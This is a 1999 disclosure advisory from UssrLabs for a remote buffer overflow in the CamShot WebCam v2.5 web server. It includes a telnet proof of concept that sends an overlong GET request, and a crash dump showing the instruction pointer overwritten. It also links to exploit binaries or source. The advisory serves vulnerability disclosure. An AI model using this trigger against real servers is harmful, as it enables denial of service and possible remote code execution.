Subject: [w00giving '99 #17] Broadgun's Camsoft Webcam v2.5 web server

Release Date: December 30, 1999

Systems Affected:
CamShot WebCam v2.5 for Win9x/WinNT and possibly other versions

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing
time stamped images captured from a video camera.  The images can be
viewed from anywhere on the network with a web browser.

THE PROBLEM

UssrLabs found a remote buffer overflow due to improper bounds checking,
which is caused by passing a lengthy GET command.  This vulnerability will
allow the execution of arbitrary code.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example:
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 

Where [buffer] is aprox. 2000 characters. At his point the server overflows.

And in remote machine someone will be see something like this.

CAMSHOT caused an invalid page fault in
module  at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this this: http://www.ussrback.com/
Vendor Status: Contacted
Program URL: http://broadgun.com/Camshot.htm

SOLUTION
Wait for the vendor to release a patch.

Greetings:
eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com




Back to Advisories Back to the main page